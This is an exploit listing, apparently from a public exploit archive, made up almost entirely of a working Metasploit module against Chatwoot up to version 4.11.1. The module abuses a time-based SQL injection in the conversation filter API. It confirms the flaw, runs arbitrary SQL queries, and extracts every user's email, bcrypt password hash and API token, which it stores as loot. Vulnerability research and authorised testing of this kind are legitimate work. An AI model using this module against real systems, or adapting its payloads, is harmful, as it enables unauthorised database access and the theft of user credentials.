Share
## https://sploitus.com/exploit?id=PACKETSTORM:223093
==================================================================================================================================
    | # Title     : Chatwoot 4.11.1 FilterService SQL Injection Module for Authenticated Exposure Validation and Database Extraction |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://www.chatwoot.com                                                                                         |
    ==================================================================================================================================
    
    [+] Summary    :  This module targets an authenticated SQL injection vulnerability in the conversation filtering functionality of Chatwoot instances up to and including version 4.11.1.
    
    
    [+] POC        :  
    
    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    class MetasploitModule < Msf::Auxiliary
      include Msf::Exploit::Remote::HttpClient
      include Msf::Auxiliary::Report
    
      # Registers the module metadata and the user-configurable options.
      #
      # @param info [Hash] metadata overrides merged in through update_info
      def initialize(info = {})
        super(
          update_info(
            info,
            'Name' => 'Chatwoot SQL Injection (CVE-2026-44706) - FilterService#lt_gt_filter',
            'Description' => %q{
              This module exploits a time-based SQL injection vulnerability in Chatwoot
              versions <= 4.11.1. The vulnerability exists in the conversation filter
              functionality, allowing an authenticated attacker to execute arbitrary
              SQL queries, extract sensitive data, and retrieve user credentials.
            },
            'Author' => ['indoushka'],
            'License' => MSF_LICENSE,
            'References' => [
              ['URL', 'https://hakaisecurity.io'],
              # CVE references take the bare identifier, without the "CVE-" prefix.
              ['CVE', '2026-44706']
            ],
            'DisclosureDate' => '2026-06-09',
            'Notes' => {
              'Stability' => [CRASH_SAFE],
              # This module never opens a session, so no session reliability is claimed.
              'Reliability' => [],
              'SideEffects' => [IOC_IN_LOGS]
            }
          )
        )

        register_options([
          OptString.new('TARGETURI', [true, 'Base path for Chatwoot', '/']),
          OptString.new('API_TOKEN', [true, 'Chatwoot API access token', '']),
          OptInt.new('ACCOUNT_ID', [true, 'Target account ID', 1]),
          OptEnum.new('ACTION', [true, 'Action to perform', 'check', ['check', 'timebased', 'extract', 'creds']]),
          OptString.new('SQL_QUERY', [false, 'SQL query for extract mode', 'SELECT version()']),
          OptInt.new('MAX_LEN', [false, 'Maximum string length for extraction', 200]),
          OptInt.new('SLEEP_TIME', [false, 'Time in seconds for sleep-based injection', 2]),
          OptFloat.new('THRESHOLD', [false, 'Time threshold for detecting sleep (seconds)', 1.5])
        ])
      end
    
      # Delay, in seconds, requested from the database when a tested condition
      # holds; read from the SLEEP_TIME option.
      def sleep_time
        datastore['SLEEP_TIME']
      end
    
      # Minimum elapsed time, in seconds, for a request to be counted as having
      # triggered the delay; read from the THRESHOLD option.
      def threshold
        datastore['THRESHOLD']
      end
    
      # Wraps an SQL fragment in the request body used for the conversation
      # filter endpoint.
      #
      # The fragment is spliced into the single value of a `created_at` /
      # `is_greater_than` filter entry.
      #
      # @param injected_sql [String] SQL fragment placed inside the filter value
      # @return [Hash] body holding one filter entry under the 'payload' key
      def build_payload(injected_sql)
        crafted_value = "2024-01-01'::date #{injected_sql} 'epoch'::date > '2024-01-01"

        date_filter = {
          'attribute_key' => 'created_at',
          'filter_operator' => 'is_greater_than',
          'values' => [crafted_value],
          'query_operator' => nil
        }

        { 'payload' => [date_filter] }
      end
    
      # POSTs a filter payload to the conversation filter endpoint of the
      # account selected by the ACCOUNT_ID option, authenticating with the
      # API_TOKEN option.
      #
      # @param payload [Hash] request body, serialized to JSON
      # @param timeout [Integer] seconds to wait for the HTTP response
      # @return [Object, nil] whatever send_request_cgi returns, or nil when a
      #   connection or timeout error was rescued
      def send_filter_request(payload, timeout = 60)
        uri = normalize_uri(target_uri.path, "/api/v1/accounts/#{datastore['ACCOUNT_ID']}/conversations/filter")

        # send_request_cgi takes the timeout as its second positional argument;
        # a 'timeout' string key inside the options hash is not used for that,
        # so the caller's timeout would otherwise be silently ignored.
        send_request_cgi(
          {
            'method' => 'POST',
            'uri' => uri,
            'ctype' => 'application/json',
            'headers' => {
              'api_access_token' => datastore['API_TOKEN']
            },
            'data' => payload.to_json
          },
          timeout
        )
      rescue ::Rex::ConnectionError, ::Rex::TimeoutError => e
        print_error("Request failed: #{e.message}")
        nil
      end
    
      # Evaluates a boolean SQL condition through response timing.
      #
      # The condition is embedded in a CASE expression that sleeps for
      # sleep_time seconds when it holds and not at all otherwise; the request
      # duration is then compared with threshold.
      #
      # @param condition [String] SQL boolean expression to test
      # @return [Boolean] true when a response arrived and took at least
      #   threshold seconds; false otherwise, including when the request failed
      def blind_check(condition)
        sqli = "AND (SELECT CASE WHEN (#{condition}) THEN pg_sleep(#{sleep_time}) ELSE pg_sleep(0) END)::text != 'x' OR"
        payload = build_payload(sqli)

        # A monotonic clock is immune to wall-clock adjustments during the wait.
        started = Process.clock_gettime(Process::CLOCK_MONOTONIC)
        res = send_filter_request(payload, sleep_time + 30)
        elapsed = Process.clock_gettime(Process::CLOCK_MONOTONIC) - started

        # A failed request (timeout, dropped connection) can also take a long
        # time; without a response its duration says nothing about the condition.
        return false if res.nil?

        elapsed >= threshold
      end
    
      # Recovers an integer value by bisecting the [low, high] range with
      # blind_check.
      #
      # Each step first tests the midpoint for equality and, if that fails,
      # tests whether the value is greater than the midpoint.
      #
      # @param expression [String] SQL expression expected to yield an integer
      # @param low [Integer] inclusive lower bound of the search range
      # @param high [Integer] inclusive upper bound of the search range
      # @return [Integer, nil] the value found, or nil when the range is
      #   exhausted without an equality match
      def extract_int(expression, low = 0, high = 10000)
        floor = low
        ceiling = high

        until floor > ceiling
          probe = (floor + ceiling) / 2
          return probe if blind_check("(#{expression}) = #{probe}")

          if blind_check("(#{expression}) > #{probe}")
            floor = probe + 1
          else
            ceiling = probe - 1
          end
        end

        nil
      end
    
      # Recovers the text form of an SQL expression one character at a time.
      #
      # The length is obtained with extract_int, then every position is
      # compared against each candidate character through blind_check until
      # one matches. Positions with no match are recorded as '?'.
      #
      # @param expression [String] SQL expression whose text value is read
      # @param max_len [Integer] upper bound used when searching for the length
      # @param charset [Array<String>, nil] candidate characters, tried in
      #   order; a built-in set is used when nil
      # @return [String] recovered text, or '' when the length is not found
      def extract_string(expression, max_len = 200, charset = nil)
        alphabet = charset || [
          *'a'..'z', *'A'..'Z', *'0'..'9',
          '@', '.', '_', '-', ':', '$', '/', ' ', '!', '#', '%', '^', '&', '*',
          '(', ')', '+', '=', '[', ']', '{', '}', '|', ';', "'", ',', '<', '>',
          '?', '~', '`', '"', '\\'
        ]

        total = extract_int("length((#{expression})::text)", 0, max_len)
        return '' unless total

        print_status("Extracting #{total} characters...")

        recovered = (1..total).each_with_object(+'') do |index, buffer|
          match = alphabet.find do |candidate|
            # Single quotes are doubled so the candidate stays inside the SQL literal.
            quoted = candidate.gsub("'", "''")
            blind_check("substring((#{expression})::text,#{index},1) = '#{quoted}'")
          end

          symbol = match || '?'
          buffer << symbol
          print(symbol)
        end

        print_line
        recovered
      end
    
      def check_vulnerability
        print_status("Checking vulnerability with OR TRUE bypass...")
        normal_payload = {
          'payload' => [
            {
              'attribute_key' => 'created_at',
              'filter_operator' => 'is_greater_than',
              'values' => ['2099-01-01'],
              'query_operator' => nil
            }
          ]
        }
        
        normal_res = send_filter_request(normal_payload)
        return false unless normal_res&.code == 200
        normal_count = JSON.parse(normal_res.body).dig('meta', 'all_count') || 0
        malicious_res = send_filter_request(build_payload('OR TRUE OR'))
        return false unless malicious_res&.code == 200
        malicious_count = JSON.parse(malicious_res.body).dig('meta', 'all_count') || 0
        
        print_status("Normal count: #{normal_count} | Malicious count: #{malicious_count}")
        
        if malicious_count > normal_count
          print_good("SQL injection confirmed!")
          return true
        else
          print_error("Inconclusive - target may not be vulnerable")
          return false
        end
      end
    
      # Measures whether an injected pg_sleep visibly delays the response.
      #
      # A request sleeping 0 seconds gives the baseline; a second request
      # sleeps for sleep_time seconds. The difference is compared with
      # threshold, so the SLEEP_TIME and THRESHOLD options apply here the same
      # way they do for blind_check.
      #
      # @return [void]
      def timebased_test
        print_status("Testing time-based injection...")

        base_time = timed_filter_request(build_payload("AND (SELECT pg_sleep(0))::text != 'x' OR"))
        return print_error('Time-based test aborted - baseline request got no response') if base_time.nil?

        print_status("Baseline time: #{format('%.2f', base_time)}s")

        delay = sleep_time
        delayed_time = timed_filter_request(
          build_payload("AND (SELECT pg_sleep(#{delay}))::text != 'x' OR"),
          delay + 30
        )
        return print_error('Time-based test aborted - delayed request got no response') if delayed_time.nil?

        print_status("Sleep(#{delay}) time: #{format('%.2f', delayed_time)}s")

        delta = delayed_time - base_time
        print_status("Delta: #{format('%.2f', delta)}s")

        if delta >= threshold
          print_good("Time-based injection confirmed!")
        else
          print_error("Time-based injection may not be exploitable")
        end
      end

      # Sends a filter request and reports how long it took.
      #
      # @param payload [Hash] request body passed to send_filter_request
      # @param timeout [Integer] timeout passed to send_filter_request
      # @return [Float, nil] elapsed seconds on a monotonic clock, or nil when
      #   no response came back (the duration is then meaningless)
      def timed_filter_request(payload, timeout = 60)
        started = Process.clock_gettime(Process::CLOCK_MONOTONIC)
        res = send_filter_request(payload, timeout)
        elapsed = Process.clock_gettime(Process::CLOCK_MONOTONIC) - started
        res.nil? ? nil : elapsed
      end
    
      # Runs the 'extract' action: recovers the text result of the SQL_QUERY
      # option (bounded by MAX_LEN) and stores it as loot when it is non-blank.
      def extract_data
        sql = datastore['SQL_QUERY']
        length_cap = datastore['MAX_LEN']

        print_status("Extracting: #{sql}")
        extracted = extract_string(sql, length_cap)

        return print_error("Extraction failed") unless extracted.present?

        print_good("Result: #{extracted}")
        store_loot('chatwoot_sql_extract', 'text/plain', rhost, extracted, 'sql_extract.txt', "Extracted SQL query result")
      end
    
      # Runs the 'creds' action.
      #
      # Counts the rows of the users table, then for each row (ordered by id)
      # reads the id, email, encrypted_password and the first matching access
      # token. Non-blank hashes and tokens are handed to report_cred, and the
      # whole set is stored as JSON loot.
      def extract_credentials
        print_status("Extracting user credentials...")
        print_status("Counting users...")
        total_users = extract_int("SELECT count(*) FROM users", 0, 100)

        if !total_users || total_users <= 0
          print_error("Could not determine user count")
          return
        end

        print_good("Found #{total_users} user(s)")

        # Candidate characters are tried in this order by extract_string.
        hash_alphabet = [*'a'..'z', *'0'..'9', '$', '2', 'a', 'b', '1', '0', '.', '/', *'A'..'Z']
        email_alphabet = [*'a'..'z', *'0'..'9', '@', '.', '_', '-', '+', *'A'..'Z']

        harvested = total_users.times.each_with_object([]) do |offset, rows|
          print_status("Processing user #{offset + 1}/#{total_users}")

          user_id = extract_int("SELECT id FROM users ORDER BY id LIMIT 1 OFFSET #{offset}", 1, 100000)
          # Rows whose id cannot be recovered are skipped entirely.
          next unless user_id

          print_status("  ID: #{user_id}")

          address = extract_string("SELECT email FROM users WHERE id=#{user_id}", 100, email_alphabet)
          digest = extract_string("SELECT encrypted_password FROM users WHERE id=#{user_id}", 60, hash_alphabet)
          api_token = extract_string("SELECT token FROM access_tokens WHERE owner_type='User' AND owner_id=#{user_id} LIMIT 1", 30)

          rows << { id: user_id, email: address, hash: digest, token: api_token }

          print_good("  Email: #{address}") if address.present?
          print_good("  Hash: #{digest}") if digest.present?
          print_good("  Token: #{api_token}") if api_token.present?
        end

        harvested.each do |row|
          if row[:hash].present?
            report_cred(
              user: row[:email],
              hash: row[:hash],
              private_type: :nonreplayable_hash,
              private_data: row[:hash],
              jtr_format: 'bcrypt'
            )
          end

          next unless row[:token].present?

          report_cred(
            user: row[:email],
            private_type: :password,
            private_data: row[:token]
          )
        end

        serialized = JSON.pretty_generate(harvested)
        store_loot('chatwoot_credentials', 'application/json', rhost, serialized, 'chatwoot_creds.json', 'Extracted credentials')
        print_good("Credentials saved to loot")
      end
      
      # Records one credential through create_credential.
      #
      # Nothing is recorded unless both :user and :private_data are non-blank.
      # Any error raised while recording is printed and swallowed, so a failed
      # report does not abort the caller.
      #
      # @param opts [Hash] credential attributes
      # @option opts [String] :user account name
      # @option opts [String] :private_data secret value (hash or token)
      # @option opts [Symbol] :private_type credential type, defaults to :password
      # @option opts [String] :jtr_format hash format name, forwarded when given
      def report_cred(opts = {})
        return unless opts[:user].present? && opts[:private_data].present?

        credential_data = {
          origin_type: :service,
          module_fullname: fullname,
          username: opts[:user],
          private_data: opts[:private_data],
          private_type: opts[:private_type] || :password,
          workspace_id: myworkspace.id,
          address: rhost,
          port: rport,
          service_name: 'chatwoot',
          protocol: 'tcp'
        }
        # Callers supply the hash format for hash-type credentials; it was
        # previously dropped here and never reached create_credential.
        credential_data[:jtr_format] = opts[:jtr_format] if opts[:jtr_format].present?

        create_credential(credential_data)
      rescue StandardError => e
        print_error("Failed to report credential: #{e.message}")
      end
    
      # Module entry point.
      #
      # Checks that an API token is set, verifies it against the profile
      # endpoint, then runs the routine selected by the ACTION option.
      def run
        token = datastore['API_TOKEN']
        unless token.present?
          print_error("API_TOKEN is required")
          return
        end

        print_status("Verifying authentication...")
        profile_res = send_request_cgi(
          'method' => 'GET',
          'uri' => normalize_uri(target_uri.path, '/api/v1/profile'),
          'headers' => { 'api_access_token' => token }
        )

        if !profile_res || profile_res.code != 200
          print_error("Authentication failed - invalid token or URL")
          return
        end

        begin
          details = JSON.parse(profile_res.body)
          print_good("Authenticated as: #{details['name']} (#{details['email']}) - Account ID: #{datastore['ACCOUNT_ID']}")
        rescue StandardError
          # The profile is only used for display; an unreadable body is not fatal.
          print_status("Authentication successful")
        end

        case datastore['ACTION']
        when 'check' then check_vulnerability
        when 'timebased' then timebased_test
        when 'extract' then extract_data
        when 'creds' then extract_credentials
        end
      end
    end
    
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================